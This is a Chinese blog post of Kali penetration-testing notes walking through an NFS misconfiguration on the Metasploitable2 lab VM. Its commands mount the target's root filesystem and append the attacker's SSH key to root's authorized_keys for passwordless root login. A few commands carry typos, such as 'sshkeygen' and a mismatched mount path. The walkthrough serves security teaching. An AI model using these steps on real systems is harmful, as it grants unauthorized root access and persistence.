kali渗透测试与教学笔记13:Linux NFS共享目录配置漏洞

最新推荐文章于 2023-02-03 09:36:29 发布
最新推荐文章于 2023-02-03 09:36:29 发布
阅读量1.3k 收藏 8
点赞数 2
分类专栏: kali 文章标签: kali
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lm19770429/article/details/105900511
版权

Linux NFS共享目录配置漏洞

靶机:metasploitable2

查看靶机上的nfs服务是否开启:rpcinfo -p 10.10.10.129

查看靶机上设置的远程共享目录列表:showmount -e 10.10.10.129

生成rsa公钥命令:sshkeygen

在渗透机 /tmp目录下新建文件夹msftables,以备后续挂载需求,命令:mkdir /tmp/msftables

把靶机10.10.10.129的根目录挂载到渗透机上新建的/tmp/mstables/目录下;

命令:mount –o nolock –t nfs 10.10.10.129:/ /tmp/msftables/

把渗透机上生成的公钥追加到靶机的authorized_keys下

命令:cat /root/.ssh/id_rsa.pub >> /tmp/msftables/root/.ssh/authorized_keys

实现无密码ssh登录:ssh root@10.10.10.129

进行登录验证

花纵酒
关注
  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali Linux渗透测试技术详解 主编:杨波、王晓卉,李亚伟 PDF
05-20
Kali Linux渗透测试技术详解 主编:杨波、王晓卉,李亚伟 PDF
Kali Linux 高级渗透测试(原书第2版)(带详细目录
06-18
KaliLinux面向专业的渗透测试和安全审计,集成了大量精心挑选的安全检测工具。本书在KaliLinux平台上从一个攻击者的角度来审视网络框架,详细介绍了攻击者“杀链”采取的具体步骤。通过阅读本书读者能快速学习并掌握渗透测试方法和工具。
50-50.渗透测试-Kali Linux漏洞利用
最新发布
05-10
50-50.渗透测试-Kali Linux漏洞利用
Linux NFS服务器的安装与配置方法(图文详解)
09-15
主要介绍了Linux NFS服务器的安装与配置方法(图文详解),需要的朋友可以参考下
Linux」- 搭建NFS服务 @20210302
k4nz
03-02 220
NFS允许系统通过网络与他人共享目录和文件。 通过使用NFS,用户和程序可以像访问本地文件一样访问远程系统上的文件。 NFS可以提供的一些最显着的好处是: 本地工作站使用较少的磁盘空间,因为常用数据可以存储在单台计算机上,并且仍然可以通过网络访问其他人。 用户不需要在每台网络机器上都有独立的主目录。 主目录可以在NFS服务器上设置并在整个网络中可用。 存储设备(如软盘,CDROM驱动器和USB拇指驱动器)可供网络上的其他计算机使用。 这可能会减少整个网络中可移动媒...
Kali网络安全终极教程
07-05
1、本课程着重分享Kali Linux渗透测试从基础学习到实战操作教程!2、本课程致力于帮助学员学习、Kali Linux环境搭建、系统操作及其实战技巧!
kali基础学习-2
CRATE_的博客
01-08 396
kali基础学习记录-2
Linux NFS共享目录配置漏洞
热门推荐
chaojixiaojingang
09-10 1万+
目的: 利用 NFS共享目录配置漏洞读取目标主机的/etc/passwd文件内容 原理: NFS服务配置漏洞赋予了根目录远程可写权限,导致/root/.ssh/authorized_keys可被修改,实现远程ssh无密码登录。 准备: Kali系统版本2.0 主机IP:192.168.1.2   靶机IP:192.168.1.3 实战: Step1:查看目标主机上NFS服务是否开启:...
Linux共享服务的漏洞,Linux NFS共享目录配置漏洞
weixin_39874196的博客
05-03 589
目的:利用 NFS共享目录配置漏洞读取目标主机的/etc/passwd文件内容原理:NFS服务配置漏洞赋予了根目录远程可写权限,导致/root/.ssh/authorized_keys可被修改,实现远程ssh无密码登录。准备:Kali系统版本2.0主机IP:192.168.1.2 靶机IP:192.168.1.3实战:Step1:查看目标主机上NFS服务是否开启:在终端输入rpcinfo -p...
nfs文件共享漏洞
m0_52433710的博客
12-21 5469
什么是nfs NFS是基于UDP/IP协议的应用,其实现主要是采用远程过程调用RPC机制,RPC提供了一组与机器、操作系统以及低层传送协议无关的存取远程文件的操作。RPC采用了XDR的支持。XDR是一种与机器无关的数据描述编码的协议,他以独立与任意机器体系结构的格式对网上传送的数据进行编码和解码,支持在异构系统之间数据的传送。 漏洞复现 攻击机:Kali 靶机:Metasploitable2 首先利用nmap对靶机 进行扫描,扫描其开放的端口: ...
Kali Linux渗透测试高级篇.rar
09-12
Kali Linux 是一款专门用于IT安全评估的Linux操作系统。目前作为被欢迎的Linux操作系统广泛用于安全评估项目中,其中提供600+安全工具,...课程主要内容:学习Kali Linux安全测试使用工具的使用,以及高级技巧的使用
Kali Linux渗透测试技术详解
02-19
第1篇为Iinux安全渗透测试基础,介绍了Linux安全透简介、安装及配置KaliLinux 操作系统、配置目标测试系统:第2篇为信息的收集及利用,介绍了信息收集、漏洞扫描、漏洞利用等技术:第3篇为各种渗透测试,介绍了权限...
未授权和敏感文件泄露
Fiverya的博客
02-03 1173
常见未授权和敏感文件泄露漏洞
metasploitable2渗透测试
qq_57976347的博客
06-06 1153
一、系统弱密码登录 1、在kali上执行命令行telnet 192.168.26.129 2、Login和password都输入msfadmin 3、登录成功,进入系统 4、测试如下: 二、MySQL弱密码登录: 1、在kali上执行mysql –h 192.168.26.129 –u root 2、登录成功,进入MySQL系统 3、测试效果: 三、PostgreSQL弱密码登录 1、在Kali上执行psql -h 192.168.26.129 –U post...
NFS未授权访问
limb0的博客
11-20 8086
NFS未授权访问 一、漏洞介绍 NFS(Network File System)即网络文件系统,它允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS的应用中,本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件,就像访问本地文件一样。若运维人员未对文件访问进行控制,将导致本地文件可被任意读取。 二、漏洞危害 本地文件可被任意读取。 三、漏洞验证 首先执行showmount试试...
渗透测试-NFS安全
课嗨教育的专栏
11-01 1752
现在,我们再回到NFS客户端以root身份登陆到NFS客户端系统中,然后尝试挂载,说到这里,您应该知道这意味着什么了,意思就是我现在只要挂上去就可以随意操作控制目标系统,如下图所示,虽然,实战中遇到直接把整个根都共享出去的情况并不多[这样的傻缺也可能会越来越少],如果是一些放有重要信息的敏感目录,即使没法直接拿到你的系统权限,但从这些重要目录文件中拿到的各类敏感信息一样不容小觑,比较简单,废话就到此为止,相信大家现在应该非常熟练了。
13.Linux存储-NFS服务
weixin_42974824的博客
05-15 730
Linux存储-NFS服务
kali2020安装w3af时,无法定位软件包python-pip python-webkit的解决办法
lm19770429的专栏
04-17 5263
w3af在kali2020下真心不好安装 一路坑坑拌伴 正常下载w3af,按要求解压在/root下 安装NPM包管理工具 apt install npm libyaml-dev libsqlite3-dev 补全python库环境 apt install python-dev build-essential libssl-dev libffi-dev libxml2-dev li...
kali linux渗透测试靶机
02-23
Kali Linux提供了多种渗透测试靶机,用于练习和测试渗透测试技术。这些靶机模拟了真实世界中的各种漏洞和攻击场景,帮助安全专业人员熟悉和理解不同类型的漏洞,并学习如何利用它们。 以下是一些常见的Kali Linux...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值